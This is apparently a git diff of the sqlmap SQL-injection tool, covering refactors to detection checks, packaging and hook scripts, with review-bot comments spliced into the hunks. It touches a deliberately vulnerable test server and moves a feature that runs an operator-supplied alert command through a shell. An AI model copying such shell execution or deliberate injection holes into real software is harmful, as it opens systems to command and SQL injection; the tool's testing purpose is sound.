a/extra/shutils/junk.sh b/extra/shutils/junk.sh index a36e0225b44..61365a754c1 100755 --- a/extra/shutils/junk.sh +++ b/extra/shutils/junk.sh @@ -1,6 +1,6 @@ #!/bin/bash -# Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) +# Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org) # See the file 'LICENSE' for copying permission find . -type d -name "__pycache__" -exec rm -rf {} \; &>/dev/null 
diff --git a/extra/shutils/modernize.sh b/extra/shutils/modernize.sh deleted file mode 100755 index e23311ceca8..00000000000 --- a/extra/shutils/modernize.sh +++ /dev/null @@ -1,8 +0,0 @@ -#!/bin/bash - -# Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) -# See the file 'LICENSE' for copying permission - -# sudo pip install modernize - -for i in $(find . -iname "*.py" | grep -v __init__); do python-modernize $i 2>&1 | grep -E '^[+-]' | grep -v range | grep -v absolute_import; done diff --git a/extra/shutils/precommit-hook.sh b/extra/shutils/precommit-hook.sh index 9a25d123bb7..300916ae369 100755 --- a/extra/shutils/precommit-hook.sh +++ b/extra/shutils/precommit-hook.sh @@ -12,17 +12,19 @@ chmod +x .git/hooks/pre-commit PROJECT="../../" SETTINGS="../../lib/core/settings.py" +DIGEST="../../data/txt/sha256sums.txt" declare -x SCRIPTPATH="${0}" PROJECT_FULLPATH=${SCRIPTPATH%/*}/$PROJECT SETTINGS_FULLPATH=${SCRIPTPATH%/*}/$SETTINGS +DIGEST_FULLPATH=${SCRIPTPATH%/*}/$DIGEST git diff $SETTINGS_FULLPATH | grep "VERSION =" > /dev/null && exit 0 if [ -f $SETTINGS_FULLPATH ] then - LINE=$(grep -o ${SETTINGS_FULLPATH} -e 'VERSION = "[0-9.]*"') + LINE=$(grep -o ${SETTINGS_FULLPATH} -e '^VERSION = "[0-9.]*"') declare -a LINE INCREMENTED=$(python -c "import re, sys, time; version = re.search('\"([0-9.]*)\"', sys.argv[1]).group(1); _ = version.split('.'); _.extend([0] * (4 - len(_))); _[-1] = str(int(_[-1]) + 1); month = str(time.gmtime().tm_mon); _[-1] = '0' if _[-2] != month else _[-1]; _[-2] = month; print sys.argv[1].replace(version, '.'.join(_))" "$LINE") if [ -n "$INCREMENTED" ] @@ -35,3 +37,6 @@ then fi git add "$SETTINGS_FULLPATH" fi + +cd $PROJECT_FULLPATH && git ls-files | sort | uniq | grep -Pv '^\.|sha256' | xargs sha256sum > $DIGEST_FULLPATH && cd - +git add "$DIGEST_FULLPATH" diff --git a/extra/shutils/pycodestyle.sh b/extra/shutils/pycodestyle.sh index 0fc4aa146d6..2302268e4c1 100755 --- a/extra/shutils/pycodestyle.sh 
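Review bot: The digest step added at the end of precommit-hook.sh pipes `git ls-files` into a newline-delimited `xargs sha256sum`, so a tracked path containing whitespace or a quote is split or mangled, and because `git add "$DIGEST_FULLPATH"` sits outside the `&&` chain a failed or partial run still stages whatever was written. The unquoted `$PROJECT_FULLPATH` and `$DIGEST_FULLPATH` have the same word-splitting problem. A NUL-delimited pipeline that aborts the commit on failure would be `git ls-files -z | grep -zPv '^\.|sha256' | sort -zu | xargs -0 sha256sum > "$DIGEST_FULLPATH" || exit 1`. Since the digest file lives in the same repository as the files it covers, it detects accidental modification rather than tampering by anyone able to rewrite both, which is worth a comment next to `DIGEST=`.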
+++ b/extra/shutils/pycodestyle.sh @@ -1,6 +1,6 @@ #!/bin/bash -# Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) +# Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org) # See the file 'LICENSE' for copying permission # Runs pycodestyle on all python files (prerequisite: pip install pycodestyle) diff --git a/extra/shutils/pydiatra.sh b/extra/shutils/pydiatra.sh index ba5db67ae74..75c19607709 100755 --- a/extra/shutils/pydiatra.sh +++ b/extra/shutils/pydiatra.sh @@ -1,6 +1,6 @@ #!/bin/bash -# Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) +# Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org) # See the file 'LICENSE' for copying permission # Runs py3diatra on all python files (prerequisite: pip install pydiatra) diff --git a/extra/shutils/pyflakes.sh b/extra/shutils/pyflakes.sh index 26651118dcb..d8649cff130 100755 --- a/extra/shutils/pyflakes.sh +++ b/extra/shutils/pyflakes.sh @@ -1,6 +1,6 @@ #!/bin/bash -# Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) +# Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org) # See the file 'LICENSE' for copying permission # Runs pyflakes on all python files (prerequisite: apt-get install pyflakes) diff --git a/extra/shutils/pylint.sh b/extra/shutils/pylint.sh deleted file mode 100755 index 114e2f9520a..00000000000 --- a/extra/shutils/pylint.sh +++ /dev/null @@ -1,6 +0,0 @@ -#!/bin/bash - -# Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) -# See the file 'LICENSE' for copying permission - -find . -wholename "./thirdparty" -prune -o -type f -iname "*.py" -exec pylint --rcfile=./.pylintrc '{}' \; diff --git a/extra/shutils/pypi.sh b/extra/shutils/pypi.sh index 254d9941476..896985c9126 100755 --- a/extra/shutils/pypi.sh +++ b/extra/shutils/pypi.sh 
@@ -16,7 +16,7 @@ cat > $TMP_DIR/setup.py << EOF #!/usr/bin/env python """ -Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) +Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org) See the file 'LICENSE' for copying permission """ @@ -38,7 +38,8 @@ setup( }, download_url='https://github.com/sqlmapproject/sqlmap/archive/$VERSION.zip', license='GNU General Public License v2 (GPLv2)', - packages=find_packages(), + packages=['sqlmap'], + package_dir={'sqlmap':'sqlmap'}, include_package_data=True, zip_safe=False, # https://pypi.python.org/pypi?%3Aaction=list_classifiers @@ -67,7 +68,7 @@ cat > sqlmap/__init__.py << EOF #!/usr/bin/env python """ -Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) +Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org) See the file 'LICENSE' for copying permission """ @@ -81,7 +82,7 @@ cat > README.rst << "EOF" sqlmap ====== -|Build Status| |Python 2.6|2.7|3.x| |License| |Twitter| +|Python 2.6|2.7|3.x| |License| |X| sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over 
@@ -159,18 +160,16 @@ Links - User's manual: https://github.com/sqlmapproject/sqlmap/wiki - Frequently Asked Questions (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ -- Twitter: https://twitter.com/sqlmap +- X: https://x.com/sqlmap - Demos: http://www.youtube.com/user/inquisb/videos - Screenshots: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots -.. |Build Status| image:: https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master - :target: https://api.travis-ci.org/sqlmapproject/sqlmap .. |Python 2.6|2.7|3.x| image:: https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg :target: https://www.python.org/ .. |License| image:: https://img.shields.io/badge/license-GPLv2-red.svg :target: https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE -.. |Twitter| image:: https://img.shields.io/badge/twitter-@sqlmap-blue.svg - :target: https://twitter.com/sqlmap +.. |X| image:: https://img.shields.io/badge/x-@sqlmap-blue.svg + :target: https://x.com/sqlmap .. pandoc --from=markdown --to=rst --output=README.rst sqlmap/README.md .. http://rst.ninjs.org/ @@ -178,5 +177,7 @@ EOF sed -i "s/^VERSION =.*/VERSION = \"$VERSION\"/g" sqlmap/lib/core/settings.py sed -i "s/^TYPE =.*/TYPE = \"$TYPE\"/g" sqlmap/lib/core/settings.py for file in $(find sqlmap -type f | grep -v -E "\.(git|yml)"); do echo include $file >> MANIFEST.in; done -python setup.py sdist upload +python setup.py sdist bdist_wheel +twine check dist/* +twine upload --config-file=~/.pypirc dist/* rm -rf $TMP_DIR diff --git a/extra/vulnserver/__init__.py b/extra/vulnserver/__init__.py index 9daf7bb7372..ba25c56a216 100644 --- a/extra/vulnserver/__init__.py +++ b/extra/vulnserver/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) +Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org) See the file 'LICENSE' for copying permission """ 
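Review bot: In the last hunk of pypi.sh, `twine upload` still runs when the build or `twine check dist/*` fails, unless the script enables `set -e` somewhere outside this hunk. Chaining the steps keeps a broken or incomplete artifact from being published: `python setup.py sdist bdist_wheel && twine check dist/* && twine upload --config-file="$HOME/.pypirc" dist/*`. The `$HOME` form is suggested because a `~` that follows `=` inside an option word is normally not expanded by the shell, so the committed line depends on twine expanding it itself.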
diff --git a/extra/vulnserver/vulnserver.py b/extra/vulnserver/vulnserver.py index 4cce7f933c6..f5d9f77ab01 100644 --- a/extra/vulnserver/vulnserver.py +++ b/extra/vulnserver/vulnserver.py @@ -3,7 +3,7 @@ """ vulnserver.py - Trivial SQLi vulnerable HTTP server (Note: for testing purposes) -Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) +Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org) See the file 'LICENSE' for copying permission """ @@ -44,7 +44,8 @@ CREATE TABLE users ( id INTEGER, name TEXT, - surname TEXT + surname TEXT, + PRIMARY KEY (id) ); INSERT INTO users (id, name, surname) VALUES (1, 'luther', 'blisset'); INSERT INTO users (id, name, surname) VALUES (2, 'fluffy', 'bunny'); diff --git a/lib/__init__.py b/lib/__init__.py index 9daf7bb7372..ba25c56a216 100644 --- a/lib/__init__.py +++ b/lib/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) +Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org) See the file 'LICENSE' for copying permission """ diff --git a/lib/controller/__init__.py b/lib/controller/__init__.py index 9daf7bb7372..ba25c56a216 100644 --- a/lib/controller/__init__.py +++ b/lib/controller/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) +Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org) See the file 'LICENSE' for copying permission """ diff --git a/lib/controller/action.py b/lib/controller/action.py index c8e6e1eaa8f..434c33ed215 100644 --- a/lib/controller/action.py +++ b/lib/controller/action.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) +Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org) See the file 'LICENSE' for copying permission """ diff --git a/lib/controller/checks.py b/lib/controller/checks.py index 95a93182536..06bf5d8b69b 100644 --- a/lib/controller/checks.py 
+++ b/lib/controller/checks.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) +Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org) See the file 'LICENSE' for copying permission """ @@ -10,8 +10,6 @@ import random import re import socket -import subprocess -import sys import time from extra.beep.beep import beep @@ -46,7 +44,6 @@ from lib.core.common import wasLastResponseDBMSError from lib.core.common import wasLastResponseHTTPError from lib.core.compat import xrange -from lib.core.convert import getBytes from lib.core.convert import getUnicode from lib.core.data import conf from lib.core.data import kb @@ -95,7 +92,6 @@ from lib.core.settings import SLEEP_TIME_MARKER from lib.core.settings import SUHOSIN_MAX_VALUE_LENGTH from lib.core.settings import SUPPORTED_DBMS -from lib.core.settings import UNICODE_ENCODING from lib.core.settings import UPPER_RATIO_BOUND from lib.core.settings import URI_HTTP_HEADER from lib.core.threads import getCurrentThreadData @@ -221,6 +217,7 @@ def checkSqlInjection(place, parameter, value): if _ > 1: __ = 2 * (_ - 1) + 1 if _ == lower else 2 * _ unionExtended = True + test.request._columns = test.request.columns test.request.columns = re.sub(r"\b%d\b" % _, str(__), test.request.columns) title = re.sub(r"\b%d\b" % _, str(__), title) test.title = re.sub(r"\b%d\b" % _, str(__), test.title) 
@@ -274,15 +271,18 @@ def checkSqlInjection(place, parameter, value): logger.debug(debugMsg) continue - if kb.dbmsFilter and not intersect(payloadDbms, kb.dbmsFilter, True): + elif kb.dbmsFilter and not intersect(payloadDbms, kb.dbmsFilter, True): debugMsg = "skipping test '%s' because " % title debugMsg += "its declared DBMS is different than provided" logger.debug(debugMsg) continue + elif kb.reduceTests is False: + pass + # Skip DBMS-specific test if it does not match the # previously identified DBMS (via DBMS-specific payload) - if injection.dbms and not intersect(payloadDbms, injection.dbms, True): + elif injection.dbms and not intersect(payloadDbms, injection.dbms, True): debugMsg = "skipping test '%s' because " % title debugMsg += "its declared DBMS is different than identified" logger.debug(debugMsg) @@ -290,7 +290,7 @@ def checkSqlInjection(place, parameter, value): # Skip DBMS-specific test if it does not match the # previously identified DBMS (via DBMS-specific error message) - if kb.reduceTests and not intersect(payloadDbms, kb.reduceTests, True): + elif kb.reduceTests and not intersect(payloadDbms, kb.reduceTests, True): debugMsg = "skipping test '%s' because the heuristic " % title debugMsg += "tests showed that the back-end DBMS " debugMsg += "could be '%s'" % unArrayizeValue(kb.reduceTests) @@ -509,7 +509,7 @@ def genCmpPayload(): falseRawResponse = "%s%s" % (falseHeaders, falsePage) # Checking if there is difference between current FALSE, original and heuristics page (i.e. not used parameter) - if not any((kb.negativeLogic, conf.string, conf.notString)): + if not any((kb.negativeLogic, conf.string, conf.notString, conf.code)): try: ratio = 1.0 seqMatcher = getCurrentThreadData().seqMatcher 
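Review bot: The new `elif kb.reduceTests is False: pass` branch in `checkSqlInjection` carries no comment, and its only effect is positional: it ends the chain before the two DBMS-specific skip checks that follow. A reader has to know that an explicit `False` is a different state from the unset default, and the place where that value is assigned is not visible in this hunk. A one-line comment would be enough, e.g. `# kb.reduceTests explicitly False: do not skip DBMS-specific tests (bypasses the two checks below)`. The function starts and ends outside the hunk.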
@@ -529,7 +529,7 @@ def genCmpPayload(): truePage, trueHeaders, trueCode = threadData.lastComparisonPage or "", threadData.lastComparisonHeaders, threadData.lastComparisonCode trueRawResponse = "%s%s" % (trueHeaders, truePage) - if trueResult and not(truePage == falsePage and not any((kb.nullConnection, conf.code))): + if trueResult and not (truePage == falsePage and not any((kb.nullConnection, conf.code))): # Perform the test's False request falseResult = Request.queryPage(genCmpPayload(), place, raise404=False) @@ -581,7 +581,7 @@ def genCmpPayload(): if injectable: if kb.pageStable and not any((conf.string, conf.notString, conf.regexp, conf.code, kb.nullConnection)): - if all((falseCode, trueCode)) and falseCode != trueCode: + if all((falseCode, trueCode)) and falseCode != trueCode and trueCode != kb.heuristicCode: suggestion = conf.code = trueCode infoMsg = "%sparameter '%s' appears to be '%s' injectable (with --code=%d)" % ("%s " % paramType if paramType != parameter else "", parameter, title, conf.code) @@ -783,22 +783,8 @@ def genCmpPayload(): injection.conf.regexp = conf.regexp injection.conf.optimize = conf.optimize - if not kb.alerted: - if conf.beep: - beep() - - if conf.alert: - infoMsg = "executing alerting shell command(s) ('%s')" % conf.alert - logger.info(infoMsg) - - try: - process = subprocess.Popen(getBytes(conf.alert, sys.getfilesystemencoding() or UNICODE_ENCODING), shell=True) - process.wait() - except Exception as ex: - errMsg = "error occurred while executing '%s' ('%s')" % (conf.alert, getSafeExString(ex)) - logger.error(errMsg) - - kb.alerted = True + if conf.beep: + beep() # There is no need to perform this test for other # tags 
@@ -813,7 +799,7 @@ def genCmpPayload(): except KeyboardInterrupt: warnMsg = "user aborted during detection phase" - logger.warn(warnMsg) + logger.warning(warnMsg) if conf.multipleTargets: msg = "how do you want to proceed? [ne(X)t target/(s)kip current test/(e)nd detection phase/(n)ext parameter/(c)hange verbosity/(q)uit]" @@ -829,11 +815,14 @@ def genCmpPayload(): choice = None while not ((choice or "").isdigit() and 0 <= int(choice) <= 6): if choice: - logger.warn("invalid value") + logger.warning("invalid value") msg = "enter new verbosity level: [0-6] " choice = readInput(msg, default=str(conf.verbose), checkBatch=False) conf.verbose = int(choice) setVerbosity() + if hasattr(test.request, "columns") and hasattr(test.request, "_columns"): + test.request.columns = test.request._columns + delattr(test.request, "_columns") tests.insert(0, test) elif choice == 'N': return None @@ -854,15 +843,13 @@ def genCmpPayload(): warnMsg = "in OR boolean-based injection cases, please consider usage " warnMsg += "of switch '--drop-set-cookie' if you experience any " warnMsg += "problems during data retrieval" - logger.warn(warnMsg) + logger.warning(warnMsg) if not checkFalsePositives(injection): if conf.hostname in kb.vulnHosts: kb.vulnHosts.remove(conf.hostname) - if NOTE.FALSE_POSITIVE_OR_UNEXPLOITABLE not in injection.notes: injection.notes.append(NOTE.FALSE_POSITIVE_OR_UNEXPLOITABLE) - else: injection = None @@ -979,7 +966,7 @@ def _(): if not retVal: warnMsg = "false positive or unexploitable injection point detected" - logger.warn(warnMsg) + logger.warning(warnMsg) kb.injection = popValue() @@ -1005,7 +992,7 @@ def checkSuhosinPatch(injection): warnMsg = "parameter length constraining " warnMsg += "mechanism detected (e.g. Suhosin patch). " warnMsg += "Potential problems in enumeration phase can be expected" - logger.warn(warnMsg) + logger.warning(warnMsg) kb.injection = popValue() 
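Review bot: In the verbosity branch (`@@ -829,11 +815,14 @@`), only `test.request.columns` is put back before `tests.insert(0, test)`; `test.title`, which the earlier `checkSqlInjection` hunk's context rewrites with the same `re.sub`, keeps the extended range. If the re-run does not take the extension path again, the logged title and the tested column range would disagree; whether that can happen is not something the hunk shows. Saving the title next to the columns (`test._title = test.title` at the save point, restored and deleted here) would keep the two in step. A short comment that `_columns` exists only while a test has been extended would also help the next reader.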
@@ -1026,7 +1013,7 @@ def checkFilteredChars(injection): warnMsg += "filtered by the back-end server. There is a strong " warnMsg += "possibility that sqlmap won't be able to properly " warnMsg += "exploit this vulnerability" - logger.warn(warnMsg) + logger.warning(warnMsg) # inference techniques depend on character '>' if not any(_ in injection.data for _ in (PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.QUERY)): @@ -1034,7 +1021,7 @@ def checkFilteredChars(injection): warnMsg = "it appears that the character '>' is " warnMsg += "filtered by the back-end server. You are strongly " warnMsg += "advised to rerun with the '--tamper=between'" - logger.warn(warnMsg) + logger.warning(warnMsg) kb.injection = popValue() @@ -1063,9 +1050,10 @@ def heuristicCheckSqlInjection(place, parameter): payload = "%s%s%s" % (prefix, randStr, suffix) payload = agent.payload(place, parameter, newValue=payload) - page, _, _ = Request.queryPage(payload, place, content=True, raise404=False) + page, _, code = Request.queryPage(payload, place, content=True, raise404=False) kb.heuristicPage = page + kb.heuristicCode = code kb.heuristicMode = False parseFilePaths(page) @@ -1125,7 +1113,7 @@ def _(page): else: infoMsg += "not be injectable" - logger.warn(infoMsg) + logger.warning(infoMsg) kb.heuristicMode = True kb.disableHtmlDecoding = True @@ -1233,7 +1221,7 @@ def checkDynamicContent(firstPage, secondPage): if count > conf.retries: warnMsg = "target URL content appears to be too dynamic. " warnMsg += "Switching to '--text-only' " - logger.warn(warnMsg) + logger.warning(warnMsg) conf.textOnly = True return 
@@ -1291,7 +1279,7 @@ def checkStability(): warnMsg += "injectable parameters are detected, or in case of " warnMsg += "junk results, refer to user's manual paragraph " warnMsg += "'Page comparison'" - logger.warn(warnMsg) + logger.warning(warnMsg) message = "how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] " choice = readInput(message, default='C').upper() @@ -1340,44 +1328,6 @@ def checkStability(): return kb.pageStable -def checkString(): - if not conf.string: - return True - - infoMsg = "testing if the provided string is within the " - infoMsg += "target URL page content" - logger.info(infoMsg) - - page, headers, _ = Request.queryPage(content=True) - rawResponse = "%s%s" % (listToStrValue(headers.headers if headers else ""), page) - - if conf.string not in rawResponse: - warnMsg = "you provided '%s' as the string to " % conf.string - warnMsg += "match, but such a string is not within the target " - warnMsg += "URL raw response, sqlmap will carry on anyway" - logger.warn(warnMsg) - - return True - -def checkRegexp(): - if not conf.regexp: - return True - - infoMsg = "testing if the provided regular expression matches within " - infoMsg += "the target URL page content" - logger.info(infoMsg) - - page, headers, _ = Request.queryPage(content=True) - rawResponse = "%s%s" % (listToStrValue(headers.headers if headers else ""), page) - - if not re.search(conf.regexp, rawResponse, re.I | re.M): - warnMsg = "you provided '%s' as the regular expression " % conf.regexp - warnMsg += "which does not have any match within the target URL raw response. sqlmap " - warnMsg += "will carry on anyway" - logger.warn(warnMsg) - - return True - @stackedmethod def checkWaf(): """ 
@@ -1408,11 +1358,10 @@ def checkWaf(): retVal = False payload = "%d %s" % (randomInt(), IPS_WAF_CHECK_PAYLOAD) + place = PLACE.GET if PLACE.URI in conf.parameters: - place = PLACE.POST value = "%s=%s" % (randomStr(), agent.addPayloadDelimiters(payload)) else: - place = PLACE.GET value = "" if not conf.parameters.get(PLACE.GET) else conf.parameters[PLACE.GET] + DEFAULT_GET_POST_DELIMITER value += "%s=%s" % (randomStr(), agent.addPayloadDelimiters(payload)) @@ -1542,7 +1491,31 @@ def checkConnection(suppressOutput=False): try: kb.originalPageTime = time.time() - Request.queryPage(content=True, noteResponseTime=False) + page, headers, _ = Request.queryPage(content=True, noteResponseTime=False) + + rawResponse = "%s%s" % (listToStrValue(headers.headers if headers else ""), page) + + if conf.string: + infoMsg = "testing if the provided string is within the " + infoMsg += "target URL page content" + logger.info(infoMsg) + + if conf.string not in rawResponse: + warnMsg = "you provided '%s' as the string to " % conf.string + warnMsg += "match, but such a string is not within the target " + warnMsg += "URL raw response, sqlmap will carry on anyway" + logger.warning(warnMsg) + + if conf.regexp: + infoMsg = "testing if the provided regular expression matches within " + infoMsg += "the target URL page content" + logger.info(infoMsg) + + if not re.search(conf.regexp, rawResponse, re.I | re.M): + warnMsg = "you provided '%s' as the regular expression " % conf.regexp + warnMsg += "which does not have any match within the target URL raw response. sqlmap " + warnMsg += "will carry on anyway" + logger.warning(warnMsg) kb.errorIsNone = False 
@@ -1557,12 +1530,12 @@ def checkConnection(suppressOutput=False): elif wasLastResponseDBMSError(): warnMsg = "there is a DBMS error found in the HTTP response body " warnMsg += "which could interfere with the results of the tests" - logger.warn(warnMsg) + logger.warning(warnMsg) elif wasLastResponseHTTPError(): if getLastRequestHTTPError() not in (conf.ignoreCode or []): warnMsg = "the web server responded with an HTTP error code (%d) " % getLastRequestHTTPError() warnMsg += "which could interfere with the results of the tests" - logger.warn(warnMsg) + logger.warning(warnMsg) else: kb.errorIsNone = True diff --git a/lib/controller/controller.py b/lib/controller/controller.py index e17470839f1..2e8d1b9d34e 100644 --- a/lib/controller/controller.py +++ b/lib/controller/controller.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) +Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org) See the file 'LICENSE' for copying permission """ @@ -9,6 +9,7 @@ import os import re +import subprocess import time from lib.controller.action import action @@ -16,10 +17,8 @@ from lib.controller.checks import checkDynParam from lib.controller.checks import checkInternet from lib.controller.checks import checkNullConnection -from lib.controller.checks import checkRegexp from lib.controller.checks import checkSqlInjection from lib.controller.checks import checkStability -from lib.controller.checks import checkString from lib.controller.checks import checkWaf from lib.controller.checks import heuristicCheckSqlInjection from lib.core.agent import agent 
@@ -70,7 +69,7 @@ from lib.core.settings import CSRF_TOKEN_PARAMETER_INFIXES from lib.core.settings import DEFAULT_GET_POST_DELIMITER from lib.core.settings import EMPTY_FORM_FIELDS_REGEX -from lib.core.settings import GOOGLE_ANALYTICS_COOKIE_PREFIX +from lib.core.settings import GOOGLE_ANALYTICS_COOKIE_REGEX from lib.core.settings import HOST_ALIASES from lib.core.settings import IGNORE_PARAMETERS from lib.core.settings import LOW_TEXT_PERCENT @@ -188,12 +187,12 @@ def _showInjections(): if conf.tamper: warnMsg = "changes made by tampering scripts are not " warnMsg += "included in shown payload content(s)" - logger.warn(warnMsg) + logger.warning(warnMsg) if conf.hpp: warnMsg = "changes made by HTTP parameter pollution are not " warnMsg += "included in shown payload content(s)" - logger.warn(warnMsg) + logger.warning(warnMsg) def _randomFillBlankFields(value): retVal = value @@ -434,7 +433,7 @@ def start(): setupTargetEnv() - if not checkConnection(suppressOutput=conf.forms) or not checkString() or not checkRegexp(): + if not checkConnection(suppressOutput=conf.forms): continue if conf.rParam and kb.originalPage: @@ -498,7 +497,7 @@ def start(): if skip: continue - if place not in conf.paramDict: + if place not in conf.paramDict or place not in conf.parameters: continue paramDict = conf.paramDict[place] 
@@ -513,6 +512,23 @@ def start(): testSqlInj = True paramKey = (conf.hostname, conf.path, place, parameter) + if kb.processUserMarks: + if testSqlInj and place not in (PLACE.CUSTOM_POST, PLACE.CUSTOM_HEADER, PLACE.URI): + if kb.processNonCustom is None: + message = "other non-custom parameters found. " + message += "Do you want to process them too? [Y/n/q] " + choice = readInput(message, default='Y').upper() + + if choice == 'Q': + raise SqlmapUserQuitException + else: + kb.processNonCustom = choice == 'Y' + + if not kb.processNonCustom: + infoMsg = "skipping %sparameter '%s'" % ("%s " % paramType if paramType != parameter else "", parameter) + logger.info(infoMsg) + continue + if paramKey in kb.testedParams: testSqlInj = False @@ -534,7 +550,7 @@ def start(): infoMsg = "skipping %sparameter '%s'" % ("%s " % paramType if paramType != parameter else "", parameter) logger.info(infoMsg) - elif conf.paramExclude and (re.search(conf.paramExclude, parameter, re.I) or kb.postHint and re.search(conf.paramExclude, parameter.split(' ')[-1], re.I)): + elif conf.paramExclude and (re.search(conf.paramExclude, parameter, re.I) or kb.postHint and re.search(conf.paramExclude, parameter.split(' ')[-1], re.I) or re.search(conf.paramExclude, place, re.I)): testSqlInj = False infoMsg = "skipping %sparameter '%s'" % ("%s " % paramType if paramType != parameter else "", parameter) 
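Review bot: The extended `conf.paramExclude` condition (`@@ -534,7 +550,7 @@`) now also runs the unanchored, case-insensitive pattern against `place`, so a pattern written for a parameter name can drop every parameter of a place whose label it happens to match, while the log line still reads `skipping ... parameter '<name>'` with no hint of the reason. Recording which side matched would make the skip auditable, for instance by appending `" (place '%s' matches exclusion pattern)" % place` to `infoMsg` when only the place matched. A comment on the condition stating that place labels are matched as well would cover the documentation side. `start()` begins and ends outside the hunk.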
@@ -547,7 +563,7 @@ def start(): logger.info(infoMsg) # Ignore session-like parameters for --level < 4 - elif conf.level < 4 and (parameter.upper() in IGNORE_PARAMETERS or any(_ in parameter.lower() for _ in CSRF_TOKEN_PARAMETER_INFIXES) or parameter.upper().startswith(GOOGLE_ANALYTICS_COOKIE_PREFIX)): + elif conf.level < 4 and (parameter.upper() in IGNORE_PARAMETERS or any(_ in parameter.lower() for _ in CSRF_TOKEN_PARAMETER_INFIXES) or re.search(GOOGLE_ANALYTICS_COOKIE_REGEX, parameter)): testSqlInj = False infoMsg = "ignoring %sparameter '%s'" % ("%s " % paramType if paramType != parameter else "", parameter) @@ -558,7 +574,7 @@ def start(): if not check: warnMsg = "%sparameter '%s' does not appear to be dynamic" % ("%s " % paramType if paramType != parameter else "", parameter) - logger.warn(warnMsg) + logger.warning(warnMsg) if conf.skipStatic: infoMsg = "skipping static %sparameter '%s'" % ("%s " % paramType if paramType != parameter else "", parameter) @@ -600,6 +616,19 @@ def start(): kb.injections.append(injection) + if not kb.alerted: + if conf.alert: + infoMsg = "executing alerting shell command(s) ('%s')" % conf.alert + logger.info(infoMsg) + try: + process = subprocess.Popen(conf.alert, shell=True) + process.wait() + except Exception as ex: + errMsg = "error occurred while executing '%s' ('%s')" % (conf.alert, getSafeExString(ex)) + logger.error(errMsg) + + kb.alerted = True + # In case when user wants to end detection phase (Ctrl+C) if not proceed: break @@ -614,7 +643,7 @@ def start(): if not injectable: warnMsg = "%sparameter '%s' does not seem to be injectable" % ("%s " % paramType if paramType != parameter else "", parameter) - logger.warn(warnMsg) + logger.warning(warnMsg) finally: if place == PLACE.COOKIE: 
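Review bot: The relocated alert block in `start()` (`@@ -600,6 +616,19 @@`) hands `conf.alert` to `subprocess.Popen(..., shell=True)` and then calls `process.wait()` with no bound and no look at the exit status, so a hanging alert command stalls the run and a failing one goes unreported. Checking the status after the wait would cover the second case: `if process.returncode: logger.warning("alerting command exited with code %d" % process.returncode)`. Because the string reaches the shell verbatim, a comment stating that `conf.alert` must only ever come from the operator's own options, never from target-derived data, belongs next to the call. The removed version encoded the command with `getBytes(...)`; whether dropping that is safe for non-ASCII commands on Python 2 is not shown by the hunk.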
@@ -711,7 +740,7 @@ def start(): if conf.multipleTargets: warnMsg = "user aborted in multiple target mode" - logger.warn(warnMsg) + logger.warning(warnMsg) message = "do you want to skip to the next target in list? [Y/n/q]" choice = readInput(message, default='Y').upper() @@ -751,7 +780,7 @@ def start(): warnMsg = "it appears that the target " warnMsg += "has a maximum connections " warnMsg += "constraint" - logger.warn(warnMsg) + logger.warning(warnMsg) if kb.dataOutputFlag and not conf.multipleTargets: logger.info("fetched data logged to text files under '%s'" % conf.outputPath) diff --git a/lib/controller/handler.py b/lib/controller/handler.py index 09a7b95337a..9d69be5a107 100644 --- a/lib/controller/handler.py +++ b/lib/controller/handler.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) +Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org) See the file 'LICENSE' for copying permission """ @@ -14,6 +14,7 @@ from lib.core.settings import ACCESS_ALIASES from lib.core.settings import ALTIBASE_ALIASES from lib.core.settings import CACHE_ALIASES +from lib.core.settings import CLICKHOUSE_ALIASES from lib.core.settings import CRATEDB_ALIASES from lib.core.settings import CUBRID_ALIASES from lib.core.settings import DB2_ALIASES @@ -46,6 +47,8 @@ from plugins.dbms.altibase import AltibaseMap from plugins.dbms.cache.connector import Connector as CacheConn from plugins.dbms.cache import CacheMap +from plugins.dbms.clickhouse.connector import Connector as ClickHouseConn +from 